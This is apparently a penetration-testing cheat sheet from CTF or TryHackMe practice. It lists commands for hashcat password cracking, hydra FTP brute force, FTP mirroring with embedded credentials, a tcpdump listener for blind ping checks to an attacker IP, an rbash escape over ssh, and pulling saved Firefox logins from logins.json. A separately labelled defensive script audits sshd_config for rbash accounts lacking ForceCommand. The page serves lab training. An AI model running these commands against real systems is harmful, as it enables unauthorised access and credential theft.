Miscellaneous

hashcat -a 0 -m 500 hash /root/Downloads/rockyou.txt --force

scp important.txt ubuntu@192.168.1.30:/home/ubuntu/transferred.txt

wget -m ftp://ftpuser:givemefiles777@10.10.94.48

python -m pyftpdlib -p 21

hydra -e nsr -l elly ftp://192.168.249.148

Turn passwd file into userlist to use in bruteforce: cut -d ":" -f 1 passwd > userlist

TCPDUMP LISTENER

Start a tcpdump listener on your local machine.

If using your own machine with the VPN connection, use:

  • sudo tcpdump ip proto \\icmp -i tun0

If using the Ethernet, use:

  • sudo tcpdump ip proto \\icmp -i eth0

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

ping <ATTACKER IP> -c 4

If you know the SSH credentials of a user who is confined to an rbash restricted shell, you can use the following command with ssh to break out of the jail and bypass rbash by starting a proper bash shell.

ssh seppuku@192.168.53.90 -t "bash --noprofile"
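The bypass above works because sshd passes a client-supplied command to the account's login shell, and a `ForceCommand` entry in sshd_config makes sshd ignore that command. The following audit is an added example, not part of the original notes: it lists rbash accounts that have no `ForceCommand`, using constructed sample data, a hypothetical `kiosk` account, and hypothetical function names.

```python
# Constructed sample data (not from a real host); "kiosk" is a hypothetical account.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
seppuku:x:1000:1000::/home/seppuku:/bin/rbash
kiosk:x:1001:1001::/home/kiosk:/bin/rbash
"""
SSHD_CONFIG = """\
Match User kiosk
    ForceCommand /usr/local/bin/kiosk-menu
"""

def rbash_users(passwd_text):
    """Accounts whose login shell (7th passwd field) is rbash."""
    rows = (line.split(":") for line in passwd_text.splitlines())
    return [f[0] for f in rows if len(f) == 7 and f[6].rsplit("/", 1)[-1] == "rbash"]

def forced_users(config_text):
    """Return (global_forced, users pinned by Match User + ForceCommand)."""
    # Simplification: only a Match line whose sole criterion is a literal
    # User list is counted; patterns or extra criteria count as not covered.
    global_forced, covered, block = False, set(), None
    for raw in config_text.splitlines():
        parts = raw.strip().split(None, 1)
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            crit = value.split()
            literal = (len(crit) == 2 and crit[0].lower() == "user"
                       and not any(c in crit[1] for c in "*?!"))
            block = crit[1].split(",") if literal else []
        elif key == "forcecommand" and value.lower() != "none":
            if block is None:
                global_forced = True   # set before any Match: applies to every account
            else:
                covered.update(block)
    return global_forced, covered

def audit(passwd_text, config_text):
    """rbash accounts whose SSH client can still supply its own command."""
    global_forced, covered = forced_users(config_text)
    if global_forced:
        return []
    return sorted(u for u in rbash_users(passwd_text) if u not in covered)

if __name__ == "__main__":
    for user in audit(PASSWD, SSHD_CONFIG):
        print(f"{user}: rbash login shell, no ForceCommand in sshd_config")
```

On a live host, `sshd -T -C user=<name>` prints the effective settings for one account, including the Match patterns this sketch treats as not covered.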

Python Library Hijacking

Exploiting Wildcard

Mozilla History Decrypt

The .mozilla directory, which holds Firefox's history for its user, can be used to get credentials. logins.json holds the encrypted login credentials.

Website:   https://tryhackme.com
Username: 'chris_w@vulnnet.thm'
Password: '{Redacted}'
